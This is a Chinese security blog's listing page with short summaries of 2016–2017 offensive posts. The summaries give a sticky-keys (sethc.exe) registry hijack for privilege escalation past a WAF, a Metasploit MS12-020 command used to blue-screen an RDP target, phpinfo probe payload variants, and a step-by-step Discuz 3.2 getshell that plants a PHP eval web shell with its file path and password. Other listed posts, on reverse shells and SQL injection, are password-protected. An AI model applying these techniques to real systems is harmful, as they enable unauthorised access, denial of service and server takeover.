2017年5月8日
低版本安全狗绕过提权实战
摘要: 执行reg文件实现shift提权"regedit /s c:\11.reg" 11.reg内容: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.e 阅读全文
posted @ 2017-05-08 17:02 小生观察室 阅读(322) 评论(0) 推荐(0) 编辑
开放了3389远程桌面的端口,但却连接不上的原因分析
摘要: 原因一:端口改了原因二:内网原因三:防火墙原因四:tcp/ip限制原因五:不属于远程登陆组原因六:waf防护(安全狗之类的)端口改了,可以webshell读取终端端口,要是能执行命令,就 先 tasklist /svc 查找那个终端服务的 pid 之后再 netstat -ano 或直接 netst 阅读全文
posted @ 2017-05-08 09:12 小生观察室 阅读(8485) 评论(0) 推荐(0) 编辑
2017年5月5日
msf之MS12-020的利用(远程桌面协议RDP拒绝访问漏洞)
摘要: 使用MSF:use auxiliary/dos/windows/rdp/ms12_020_maxchannelids 利用此漏洞我测试目标的远程端口为33890,如图: 当出现 seems down就说明目标已经被攻击。如图已经蓝屏。 阅读全文
posted @ 2017-05-05 14:22 小生观察室 阅读(1741) 评论(0) 推荐(0) 编辑
2017年5月4日
通过LF getshell
该文被密码保护。 阅读全文
posted @ 2017-05-04 10:25 小生观察室 阅读(0) 评论(0) 推荐(0) 编辑
2017年3月10日
Discuz 7.2+SQL注入漏洞+爆管理员+爆UC_Key
该文被密码保护。 阅读全文
posted @ 2017-03-10 21:22 小生观察室 阅读(0) 评论(0) 推荐(0) 编辑
phpinfo的多种写法进行exp测试
摘要: <?;phpinfo();?> <?php phpinfo();?> <?php;phpinfo();?> <? phpinfo();?> <?phpeval ('phpinfo();');?>//如果是包含的话 有分号反到会错 有时URL提交禁止空格 特别是某漏洞序列化 通过URL 不能传空格 阅读全文
posted @ 2017-03-10 21:03 小生观察室 阅读(1011) 评论(0) 推荐(0) 编辑
2017年1月11日
电脑文件夹属性中的隐藏选项无法勾选的解决方法
摘要: 有时候我们会因为一些特殊的需求,要对某些文件夹设置隐藏属性,但是打开文件夹属性后却发现,不知道由于什么原因导致文件夹属性中的隐藏选项无法勾选,在这样的情况下,我们应该怎么进行解决呢? 1、按Win+X选择打开“命令提示符(管理员)”,或者右击命令提示符,选择“以管理员身份运行”; 2、在打开的cmd 阅读全文
posted @ 2017-01-11 11:57 小生观察室 阅读(547) 评论(0) 推荐(0) 编辑
2016年12月20日
国外渗透思路一记
该文被密码保护。 阅读全文
posted @ 2016-12-20 16:22 小生观察室 阅读(7) 评论(0) 推荐(0) 编辑
linux nc反弹 + 可用脚本转发(python版)
该文被密码保护。 阅读全文
posted @ 2016-12-20 16:15 小生观察室 阅读(7) 评论(0) 推荐(0) 编辑
2016年8月15日
Discuz3.2 getshell技巧
摘要: 1.首先在后台安装一个插件,自带的"好贷站长联盟"就行. 2.单击接口信息,导入接口信息. 3.这里写入一句话木马 1');eval($_POST[pass]);// OK,搞定!一句话路径 : /data/dzapp_haodai_config.php 密码 pass 阅读全文
posted @ 2016-08-15 19:25 小生观察室 阅读(501) 评论(0) 推荐(0) 编辑